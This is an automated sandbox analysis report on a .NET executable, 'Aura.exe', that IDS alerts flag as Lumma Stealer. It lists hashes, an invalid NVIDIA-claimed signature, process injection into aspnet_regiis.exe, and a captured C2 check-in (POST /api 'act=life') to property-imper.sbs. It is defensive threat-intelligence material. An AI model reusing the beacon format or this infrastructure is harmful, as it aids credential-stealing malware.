                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.4219355515615115
                                              Encrypted:false
                                              SSDEEP:6144:5Svfpi6ceLP/9skLmb0OTfWSPHaJG8nAgeMZMMhA2fX4WABlEnNs0uhiTwN:wvloTfW+EZMM6DFya03wN
                                              MD5:143AB3B0A4B9445FB74C2916186C6C2D
                                              SHA1:A9CA8A4E5E32100A9BD62671BE40CDAC8267D13F
                                              SHA-256:7FA8F23B289D3A2389E1629543B815CD8919BFD8A66DAA98EEE77DC68403FF91
                                              SHA-512:37A46F81C4EBC6CB377C5B7292FF4B9351B49B1E2295739D4F48DDC5E2587D47D380A329A49EA73A8650511500BB3A9D39DBCD44A9B399F7EB5902A39A124AEB
                                              Malicious:false
                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....=.................................................................................................................................................................................................................................................................................................................................................!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Aura.exe
                                              File Type:ASCII text, with very long lines (351), with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):1412
                                              Entropy (8bit):4.544151385757137
                                              Encrypted:false
                                              SSDEEP:24:7v74NutaMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4vMff2p8p14nrPKktp
                                              MD5:4E78335F1D364EDBD85752D807DF8D45
                                              SHA1:E764A8C4B616549527E6A4F0C0CE48E407D28D8C
                                              SHA-256:E4349B87BC125DFEE3F89EF2C00483ACE049BF15798C8A7271A8E9B1D13B552F
                                              SHA-512:90A9E6914757DEEE1AA154EC09D65D00FAE926D1BCBD0EE6D3D6AA270778FAA51085553160F282DC4E327EA1AB403F075A1555E3ED2BDE0B02D66AA4F9F9377A
                                              Malicious:false
                                              Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "QuinnAvaKaitlyn" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStrin
                                              File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.768201752910843
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.96%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Aura.exe
                                              File size:728'104 bytes
                                              MD5:137e48d526e2a840e07d309edffaca30
                                              SHA1:294d908562372639119ff5fc7e0e4c8b528bd3f7
                                              SHA256:18344d1186a130b07d7f6da7fd4164ae5e03863873df9872bdd4151abef46df3
                                              SHA512:1d3be4e140809b126022dc09a2e5e65edbd323a0a9b65c89a030038efd08862141fa8a0cc4cd3025a25453cea26ca515d62c934613fa7401b5c251165c9c0edf
                                              SSDEEP:12288:fqmauhQcfY+QL+YaiFTobErR4OgjH28v3moOSF+NhAYU15gwMalxBy2YbfsCtd5Z:5arcfYtL+YakTrrR4V728veSF+N2Gt
                                              TLSH:75F48DDC726072DFD867D472DEA86CA8EA50787B971F4203902706AD9E4D887CF191F2
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../Ag..............0..............`... ... ....@.. ....................................@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x4b600a
                                              Entrypoint Section:
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67412FAE [Sat Nov 23 01:28:14 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                              Subject Chain
                                              • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                              Version:3
                                              Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                              Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                              Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                              Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                              Instruction
                                              jmp dword ptr [004B6000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9277c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x648.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xaf6000x2628
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0xb60000x8
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x920000x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              $;3F&L0x20000x8f3f80x8f400cb6a4f3661634ec651d3cdb5e059fa89False1.0003169993455496data7.999725121175837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .text0x920000x1f0100x1f200b1ff1f21f9ecb08cd371efb342967143False0.3293800200803213data4.689530449959602IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb20000x6480x80081b6fb8dfc5ceb4f589a3409a7c7a50dFalse0.3505859375data3.5637252639120764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xb40000xc0x2009d7743fe20d48f4946db51a87cf62226False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              0xb60000x100x2007486388d5ab0f9dfde32da3bc1d9fb5dFalse0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xb20a00x3bcdata0.42677824267782427
                                              RT_MANIFEST0xb245c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-23T14:17:47.880345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                              2024-11-23T14:17:49.331302+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549708104.21.33.116443TCP
                                              2024-11-23T14:17:49.331302+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708104.21.33.116443TCP
                                              2024-11-23T14:17:50.300714+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.33.116443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 23, 2024 14:17:46.604371071 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:46.604420900 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:46.604521036 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:46.606002092 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:46.606033087 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:47.880184889 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:47.880345106 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:48.005230904 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:48.005254984 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:48.006333113 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:48.053390980 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:48.076342106 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:48.076441050 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:48.076510906 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.331402063 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.331687927 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.331768036 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.333530903 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.333568096 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.333601952 CET49708443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.333633900 CET44349708104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.404381990 CET49710443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.404400110 CET44349710104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:49.404472113 CET49710443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.404795885 CET49710443192.168.2.5104.21.33.116
                                              Nov 23, 2024 14:17:49.404810905 CET44349710104.21.33.116192.168.2.5
                                              Nov 23, 2024 14:17:50.300714016 CET49710443192.168.2.5104.21.33.116
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 23, 2024 14:17:46.307820082 CET5564053192.168.2.51.1.1.1
                                              Nov 23, 2024 14:17:46.549971104 CET53556401.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 23, 2024 14:17:46.307820082 CET192.168.2.51.1.1.10x27b1Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 23, 2024 14:17:46.549971104 CET1.1.1.1192.168.2.50x27b1No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                              Nov 23, 2024 14:17:46.549971104 CET1.1.1.1192.168.2.50x27b1No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                              • property-imper.sbs
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549708104.21.33.1164431992C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-23 13:17:48 UTC265OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 8
                                              Host: property-imper.sbs
                                              2024-11-23 13:17:48 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                              Data Ascii: act=life
                                              2024-11-23 13:17:49 UTC1014INHTTP/1.1 200 OK
                                              Date: Sat, 23 Nov 2024 13:17:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=jo7maj0p55h12sqlstmff7hv7t; expires=Wed, 19-Mar-2025 07:04:27 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erUchS9VEy2vnh60QhEUbedAanV%2Bbgod2cCRdt28jIcXV5NRAdiMjYeC%2FRpG5Ab3WUPRU3j1kULZ5PmQ1C0fR8YKcaUVPG66QxTV5i%2F7bSGreI9VU2LM1dbgmtdypiR9PaCYnOU%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e7171087e0743e3-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2401&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1199178&cwnd=234&unsent_bytes=0&cid=f91369745a780b80&ts=1471&x=0"
                                              2024-11-23 13:17:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                              Data Ascii: 2ok
                                              2024-11-23 13:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Users\user\Desktop\Aura.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Aura.exe"
                                              Imagebase:0x330000
                                              File size:728'104 bytes
                                              MD5 hash:137E48D526E2A840E07D309EDFFACA30
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                              Imagebase:0x230000
                                              File size:43'016 bytes
                                              MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:08:17:45
                                              Start date:23/11/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
                                              Imagebase:0x60000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:08:18:01
                                              Start date:23/11/2024
                                              Path:C:\Windows\System32\SIHClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2
                                              Imagebase:0x7ff67bb50000
                                              File size:380'720 bytes
                                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:16.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:8.4%
                                                Total number of Nodes:1447
                                                Total number of Limit Nodes:9
                                                execution_graph 10412 6cdc5e58 GetCommandLineA GetCommandLineW 10279 6cdc7899 10282 6cdc764e 10279->10282 10280 6cdc1740 _ValidateLocalCookies 5 API calls 10281 6cdc765b 10280->10281 10282->10280 10282->10282 11003 6cdc9d9b IsProcessorFeaturePresent 10413 6cdc4054 10414 6cdc4057 10413->10414 10415 6cdc40d9 __fassign 37 API calls 10414->10415 10416 6cdc4063 10415->10416 10283 6cdc3695 10284 6cdc4028 37 API calls 10283->10284 10285 6cdc369d 10284->10285 10286 6cdc2a90 10287 6cdc2aae 10286->10287 10298 6cdc2a50 10287->10298 10299 6cdc2a6f 10298->10299 10300 6cdc2a62 10298->10300 10301 6cdc1740 _ValidateLocalCookies 5 API calls 10300->10301 10301->10299 10440 6cdc2e10 10441 6cdc2e22 10440->10441 10443 6cdc2e30 10440->10443 10442 6cdc1740 _ValidateLocalCookies 5 API calls 10441->10442 10442->10443 10444 6cdc7210 10447 6cdc7197 10444->10447 10448 6cdc71a3 ___scrt_is_nonwritable_in_current_image 10447->10448 10455 6cdc488a EnterCriticalSection 10448->10455 10450 6cdc71db 10460 6cdc71f9 10450->10460 10451 6cdc71ad 10451->10450 10456 6cdc75a5 10451->10456 10455->10451 10457 6cdc75b3 __fassign 10456->10457 10459 6cdc75c0 10456->10459 10458 6cdc72d8 __fassign 14 API calls 10457->10458 10457->10459 10458->10459 10459->10451 10463 6cdc48d2 LeaveCriticalSection 10460->10463 10462 6cdc71e7 10463->10462 10835 6cdc53cd 10836 6cdc53df 10835->10836 10837 6cdc53db 10835->10837 10838 6cdc540a 10836->10838 10839 6cdc53e4 10836->10839 10838->10837 10846 6cdc605f 10838->10846 10840 6cdc4b96 _free 14 API calls 10839->10840 10841 6cdc53ed 10840->10841 10843 6cdc4bf3 _free 14 API calls 10841->10843 10843->10837 10844 6cdc542a 10845 6cdc4bf3 _free 14 API calls 10844->10845 10845->10837 10847 6cdc606c 10846->10847 10848 6cdc6087 10846->10848 10847->10848 10849 6cdc6078 10847->10849 10850 6cdc6096 10848->10850 10855 6cdc7ff9 10848->10855 10851 6cdc4b83 _free 14 API calls 10849->10851 10862 6cdc802c 10850->10862 10854 6cdc607d __DllMainCRTStartup@12 10851->10854 10854->10844 10856 6cdc8019 HeapSize 10855->10856 10857 6cdc8004 10855->10857 10856->10850 10858 6cdc4b83 _free 14 API calls 10857->10858 10859 6cdc8009 10858->10859 10860 6cdc4ac6 __fassign 25 API calls 10859->10860 10861 6cdc8014 10860->10861 10861->10850 10863 6cdc8039 10862->10863 10864 6cdc8044 10862->10864 10865 6cdc6f6c 15 API calls 10863->10865 10866 6cdc804c 10864->10866 10872 6cdc8055 _free 10864->10872 10870 6cdc8041 10865->10870 10867 6cdc4bf3 _free 14 API calls 10866->10867 10867->10870 10868 6cdc807f HeapReAlloc 10868->10870 10868->10872 10869 6cdc805a 10871 6cdc4b83 _free 14 API calls 10869->10871 10870->10854 10871->10870 10872->10868 10872->10869 10873 6cdc67b5 _free 2 API calls 10872->10873 10873->10872 11061 6cdc3f0d 11064 6cdc3f93 11061->11064 11065 6cdc3f20 11064->11065 11066 6cdc3fa7 11064->11066 11066->11065 11067 6cdc4bf3 _free 14 API calls 11066->11067 11067->11065 9175 6cdc1a8e 9176 6cdc1a9c 9175->9176 9177 6cdc1a97 9175->9177 9181 6cdc1958 9176->9181 9196 6cdc1c20 9177->9196 9182 6cdc1964 ___scrt_is_nonwritable_in_current_image 9181->9182 9183 6cdc198d dllmain_raw 9182->9183 9184 6cdc1988 9182->9184 9193 6cdc1973 9182->9193 9185 6cdc19a7 dllmain_crt_dispatch 9183->9185 9183->9193 9200 6cdc0a10 9184->9200 9185->9184 9185->9193 9188 6cdc19f9 9189 6cdc1a02 dllmain_crt_dispatch 9188->9189 9188->9193 9191 6cdc1a15 dllmain_raw 9189->9191 9189->9193 9190 6cdc0a10 __DllMainCRTStartup@12 5 API calls 9192 6cdc19e0 9190->9192 9191->9193 9204 6cdc18a8 9192->9204 9195 6cdc19ee dllmain_raw 9195->9188 9197 6cdc1c36 9196->9197 9198 6cdc1c3f 9197->9198 9529 6cdc1bd3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9197->9529 9198->9176 9201 6cdc0a74 9200->9201 9231 6cdc1740 9201->9231 9203 6cdc160c 9203->9188 9203->9190 9206 6cdc18b4 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 9204->9206 9205 6cdc18bd 9205->9195 9206->9205 9207 6cdc18e5 9206->9207 9208 6cdc1950 9206->9208 9239 6cdc1dbb 9207->9239 9260 6cdc1f8a IsProcessorFeaturePresent 9208->9260 9211 6cdc18ea 9248 6cdc1c77 9211->9248 9213 6cdc1957 ___scrt_is_nonwritable_in_current_image 9214 6cdc198d dllmain_raw 9213->9214 9216 6cdc1988 9213->9216 9228 6cdc1973 9213->9228 9217 6cdc19a7 dllmain_crt_dispatch 9214->9217 9214->9228 9215 6cdc18ef __RTC_Initialize __DllMainCRTStartup@12 9251 6cdc1f5c 9215->9251 9219 6cdc0a10 __DllMainCRTStartup@12 5 API calls 9216->9219 9217->9216 9217->9228 9221 6cdc19c8 9219->9221 9223 6cdc19f9 9221->9223 9225 6cdc0a10 __DllMainCRTStartup@12 5 API calls 9221->9225 9224 6cdc1a02 dllmain_crt_dispatch 9223->9224 9223->9228 9226 6cdc1a15 dllmain_raw 9224->9226 9224->9228 9227 6cdc19e0 9225->9227 9226->9228 9229 6cdc18a8 __DllMainCRTStartup@12 79 API calls 9227->9229 9228->9195 9230 6cdc19ee dllmain_raw 9229->9230 9230->9223 9232 6cdc1748 9231->9232 9233 6cdc1749 IsProcessorFeaturePresent 9231->9233 9232->9203 9235 6cdc1aee 9233->9235 9238 6cdc1ab1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9235->9238 9237 6cdc1bd1 9237->9203 9238->9237 9240 6cdc1dc0 ___scrt_release_startup_lock 9239->9240 9241 6cdc1dc4 9240->9241 9244 6cdc1dd0 __DllMainCRTStartup@12 9240->9244 9264 6cdc3e4e 9241->9264 9245 6cdc1ddd 9244->9245 9267 6cdc36b1 9244->9267 9245->9211 9401 6cdc2bee InterlockedFlushSList 9248->9401 9252 6cdc1f68 9251->9252 9253 6cdc190e 9252->9253 9408 6cdc3fe6 9252->9408 9257 6cdc194a 9253->9257 9255 6cdc1f76 9413 6cdc2c46 9255->9413 9512 6cdc1dde 9257->9512 9261 6cdc1fa0 __DllMainCRTStartup@12 9260->9261 9262 6cdc204b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9261->9262 9263 6cdc2096 __DllMainCRTStartup@12 9262->9263 9263->9213 9278 6cdc3d19 9264->9278 9268 6cdc36bf 9267->9268 9277 6cdc36d0 9267->9277 9349 6cdc3757 GetModuleHandleW 9268->9349 9272 6cdc370a 9272->9211 9356 6cdc3577 9277->9356 9279 6cdc3d25 ___scrt_is_nonwritable_in_current_image 9278->9279 9286 6cdc488a EnterCriticalSection 9279->9286 9281 6cdc3d33 9287 6cdc3d74 9281->9287 9286->9281 9288 6cdc3d93 9287->9288 9289 6cdc3d40 9287->9289 9288->9289 9294 6cdc4bf3 9288->9294 9291 6cdc3d68 9289->9291 9348 6cdc48d2 LeaveCriticalSection 9291->9348 9293 6cdc1dce 9293->9211 9295 6cdc4bfe HeapFree 9294->9295 9296 6cdc4c27 _free 9294->9296 9295->9296 9297 6cdc4c13 9295->9297 9296->9289 9300 6cdc4b83 9297->9300 9303 6cdc474e GetLastError 9300->9303 9302 6cdc4b88 GetLastError 9302->9296 9304 6cdc4765 9303->9304 9305 6cdc476b 9303->9305 9326 6cdc6341 9304->9326 9325 6cdc4771 SetLastError 9305->9325 9331 6cdc6380 9305->9331 9312 6cdc47b8 9315 6cdc6380 _free 6 API calls 9312->9315 9313 6cdc47a1 9314 6cdc6380 _free 6 API calls 9313->9314 9316 6cdc47af 9314->9316 9317 6cdc47c4 9315->9317 9320 6cdc4bf3 _free 12 API calls 9316->9320 9318 6cdc47c8 9317->9318 9319 6cdc47d9 9317->9319 9321 6cdc6380 _free 6 API calls 9318->9321 9343 6cdc43f9 9319->9343 9320->9325 9321->9316 9324 6cdc4bf3 _free 12 API calls 9324->9325 9325->9302 9327 6cdc61e1 _free 5 API calls 9326->9327 9328 6cdc635d 9327->9328 9329 6cdc6378 TlsGetValue 9328->9329 9330 6cdc6366 9328->9330 9330->9305 9332 6cdc61e1 _free 5 API calls 9331->9332 9333 6cdc639c 9332->9333 9334 6cdc63ba TlsSetValue 9333->9334 9335 6cdc4789 9333->9335 9335->9325 9336 6cdc4b96 9335->9336 9342 6cdc4ba3 _free 9336->9342 9337 6cdc4be3 9339 6cdc4b83 _free 13 API calls 9337->9339 9338 6cdc4bce RtlAllocateHeap 9340 6cdc4799 9338->9340 9338->9342 9339->9340 9340->9312 9340->9313 9341 6cdc67b5 _free EnterCriticalSection LeaveCriticalSection 9341->9342 9342->9337 9342->9338 9342->9341 9344 6cdc428d _free EnterCriticalSection LeaveCriticalSection 9343->9344 9345 6cdc4467 9344->9345 9346 6cdc439f _free 14 API calls 9345->9346 9347 6cdc4490 9346->9347 9347->9324 